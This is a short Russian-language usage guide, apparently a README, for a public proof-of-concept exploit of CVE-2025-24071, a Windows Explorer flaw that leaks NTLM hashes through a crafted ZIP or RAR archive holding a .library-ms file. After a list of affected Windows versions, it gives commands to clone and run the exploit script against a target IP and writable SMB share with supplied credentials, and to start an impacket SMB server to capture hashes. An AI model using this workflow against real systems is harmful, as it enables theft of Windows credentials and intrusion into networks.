
Уязвимость спуфинга проводника Windows - CVE-2025-24071
Уязвимость подмены проводника Windows - CVE-2025-24071
Утечка NTLM-хэша Windows путем извлечения специально подготовленного ZIP- или RAR-файла и эксплуатации уязвимости при обработке файлов .library-ms (типа файлов, используемых Windows для указания библиотек и сетевых подключений).
Windows 10 версии 1809 для 64-разрядных систем Windows 10 версии 1809 для 32-разрядных систем Windows Server 2025 (установка Server Core) Windows Server 2025 Windows Server 2012 R2 (установка Server Core) Windows Server 2012 R2 Windows Server 2016 (установка Server Core) Windows Server 2016 Windows 10 версии 1607 для 64-разрядных систем Windows 10 версии 1607 для 32-разрядных систем Windows 10 для 64-разрядных систем Windows 10 для 32-разрядных систем Windows 11 версии 24H2 для 64-разрядных систем Windows 11 версии 24H2 для систем на базе ARM64 Windows Server 2022, редакция 23H2 (установка Server Core) Windows 11 версии 23H2 для 64-разрядных систем Windows 11 версии 23H2 для систем на базе ARM64 Windows 10 версии 22H2 для 32-разрядных систем Windows 10 версии 22H2 для систем на базе ARM64 Windows 10 версии 22H2 для 64-разрядных систем Windows 11 версии 22H2 для 64-разрядных систем Windows 11 версии 22H2 для систем на базе ARM64 Windows 10 версии 21H2 для 64-разрядных систем Windows 10 версии 21H2 для систем на базе ARM64 Windows 10 версии 21H2 для 32-разрядных систем Windows Server 2022 (установка Server Core) Windows Server 2022 Windows Server 2019 (установка Server Core) Windows Server 2019
git clone https://github.com/f4dee-backup/CVE-2025-24071
cd CVE-2025-24071
chmod +x CVE-2025-24071.sh
./CVE-2025-24071.sh -h
-i) Ваш IP-адрес
-t) IP-адрес цели
-d) Удаленная SMB-шара с правами на запись (например, C, ADMIN, IPC, SYSVOL и т.д.)
-u) Имя пользователя
-p) Пароль
-h) Отобразить эту панель справки
./CVE-2025-24071.sh -i "ВАШ_IP" -t "IP_ЦЕЛИ" -d "УДАЛЕННЫЙ_КАТАЛОГ_ЗАПИСЬ" -u "ПОЛЬЗОВАТЕЛЬ" -p "ПАРОЛЬ"
impacket-smbserver smbFolder $(pwd) -smb2support